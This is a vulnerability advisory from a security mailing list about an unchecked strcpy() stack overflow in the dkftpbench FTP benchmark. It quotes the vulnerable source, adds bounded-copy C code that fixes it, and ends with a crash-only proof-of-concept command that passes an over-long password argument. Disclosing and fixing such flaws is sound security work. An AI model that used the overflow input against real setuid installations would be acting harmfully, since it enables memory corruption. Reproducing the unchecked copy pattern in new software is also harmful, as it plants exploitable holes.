
To: vulnwatch <vulnwatch@vulnwatch.org>
Subject: [VulnWatch] dkftpbench 0.45 (Platoon:init) Local buffer overflow vulnerability
From: starcadi <starcadi@gmail.com>
Date: Mon, 19 Mar 2007 20:33:34 +0100
Description:

dkftpbench is an FTP benchmark program inspired by SPECweb99. The
result of the benchmark is a number-of-simultaneous-users rating;
after running the benchmark properly, you have a good idea how many
simultaneous dialup clients a server can support. The target bandwidth
per client is set at 28.8 kilobits/second to model dialup users; this
is important for servers on the real Internet, which often serve
thousands of clients on only 10 MBits/sec of bandwidth.
Platoon::init() copies the user-supplied username, password and server
name into fixed-size character arrays with strcpy() and no length check,
so an over-long -u, -p or -h argument overflows the corresponding member
of the Platoon object that main() allocates on its stack. dkftpbench is a
benchmark client that takes these values from its own command line, so
the overflow only crosses a privilege boundary if the binary is installed
setuid or is invoked with arguments an untrusted party controls.
source: http://www.kegel.com/dkftpbench/

Source error:

in main():
--
int main(int argc, char **argv)
{
        [..]
        const char *arg_username = "anonymous";
        const char *arg_password = "robouser@";

        [..]
                } else if (!strncmp(argv[i], "-u", 2)) {
                        arg_username = &argv[i][2];
                } else if (!strncmp(argv[i], "-p", 2)) {
                        arg_password = &argv[i][2];

        [..]
        Platoon thePlatoon;
        thePlatoon.init(poller, &sked, arg_filename,
                arg_clientBandwidth, arg_minClientBandwidth, arg_mtu,
                arg_hostname, arg_portnum, arg_username, arg_password,
                local_addrs, n_local_addrs);

        [..]
}
--

in Platoon.h:
--
        /// The user name part of the URL to fetch
        char m_username[128];
        /// The password part of the URL to fetch
        char m_passwd[128];
--

in Platoon.c:
--
void Platoon::init(Poller *poller, Sked *sked, const char *filename,
        int maxBytesPerSec, int minBytesPerSec, int bytesPerRead,
        const char *servername, int port,
        const char *username, const char *passwd,
        struct sockaddr_in *local_addrs, int n_local_addrs)
{
        [..]
        m_port = port;
        m_sked = sked;
        strcpy(m_passwd, passwd);
        strcpy(m_servername, servername);
        strcpy(m_username, username);
        m_verbosity = 0;
        m_local_addrs = local_addrs;
        [..]
}
--
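To make the defect concrete, here is an added example (not dkftpbench code) that mirrors the three strcpy() calls above with a bounded copy that rejects, rather than silently truncates, any field that does not fit in a 128-byte member. The struct layout, the function names platoon_init_checked(), copy_bounded() and make_poc_password(), and the PLATOON_NAME_MAX constant are assumptions made for the illustration; the 135-byte input reproduces the advisory's perl payload.

```c
/* Added example, not part of dkftpbench: a bounded replacement for the
 * unchecked strcpy() calls in Platoon::init(). Names are illustrative. */
#include <stdio.h>
#include <string.h>

#define PLATOON_NAME_MAX 128   /* same size as m_username / m_passwd */

/* Assumed layout mirroring the fixed-size members shown in Platoon.h. */
struct platoon {
    char servername[PLATOON_NAME_MAX];
    char username[PLATOON_NAME_MAX];
    char passwd[PLATOON_NAME_MAX];
};

/* Copy src into dst[dst_size]. Returns 0 on success, -1 if src (plus its
 * NUL terminator) does not fit. Rejecting is preferable to truncating: a
 * silently shortened password or host name just yields a confusing login
 * failure later. memchr() never reads past dst_size bytes of src. */
static int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    const char *end = memchr(src, '\0', dst_size);
    if (end == NULL)            /* no terminator within dst_size bytes */
        return -1;
    memcpy(dst, src, (size_t)(end - src) + 1);
    return 0;
}

/* Hardened counterpart of the three strcpy() calls in Platoon::init().
 * Returns 0 if every field fits, otherwise a negative code naming the
 * offending field (-1 servername, -2 username, -3 passwd). */
int platoon_init_checked(struct platoon *p, const char *servername,
                         const char *username, const char *passwd)
{
    if (copy_bounded(p->servername, sizeof p->servername, servername) != 0)
        return -1;
    if (copy_bounded(p->username, sizeof p->username, username) != 0)
        return -2;
    if (copy_bounded(p->passwd, sizeof p->passwd, passwd) != 0)
        return -3;
    return 0;
}

/* Builds the advisory's PoC argument: `len` bytes of 'A', as produced by
 * perl -e "print 'A'x135". buf must hold len + 1 bytes. */
void make_poc_password(char *buf, size_t len)
{
    memset(buf, 'A', len);
    buf[len] = '\0';
}

int main(void)
{
    struct platoon p;
    char poc[256];   /* constructed input buffer */

    /* The program's own defaults from main() fit comfortably. */
    printf("defaults: %d\n",
           platoon_init_checked(&p, "localhost", "anonymous", "robouser@"));

    /* The advisory's 135-byte password is rejected instead of overflowing. */
    make_poc_password(poc, 135);
    printf("135 x 'A' as password: %d\n",
           platoon_init_checked(&p, "localhost", "anonymous", poc));

    /* 127 bytes plus the terminator is the largest value that fits. */
    make_poc_password(poc, 127);
    printf("127 x 'A' as password: %d\n",
           platoon_init_checked(&p, "localhost", "anonymous", poc));

    /* 128 bytes leaves no room for the terminator and is also rejected. */
    make_poc_password(poc, 128);
    printf("128 x 'A' as servername: %d\n",
           platoon_init_checked(&p, poc, "anonymous", "robouser@"));
    return 0;
}
```

The boundary condition worth remembering is the terminator: a 128-byte input into a 128-byte array is already one byte too long, which is why the check uses memchr() over dst_size bytes rather than comparing strlen() against the array size.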

Proof of concept:

$ dkftpbench -n1 -hlocalhost -P21 -utest -p`perl -e "print 'A'x135"` -v1
-h127.0.0.1 host name of ftp server
-P21 port number of ftp server
-n1 number of users
-c1 target number of simultaneous connection attempts
-k2 Start next connection when: 1=immediately, 2=after prev connect complete
-t0 length of run (in seconds)
-b3600 desired bandwidth (in bytes per second)
-B2700 min acceptable per-client bandwidth (in bytes per second)
-ufederico user name
-paaaaaa[..]
-fusenet/rec.juggling/juggling.FAQ.Z file to fetch
-m1500 bytes per 'packet'
-v1 verbosity
-sp selector (p=poll, s=select, d=/dev/poll, k=kqueue, r=rtsig, f=sig-per-fd)
-a0 use all local interfaces
Using poll()
Segmentation fault
$

--
.original http://intel.shacknet.nu/
~ starcadi
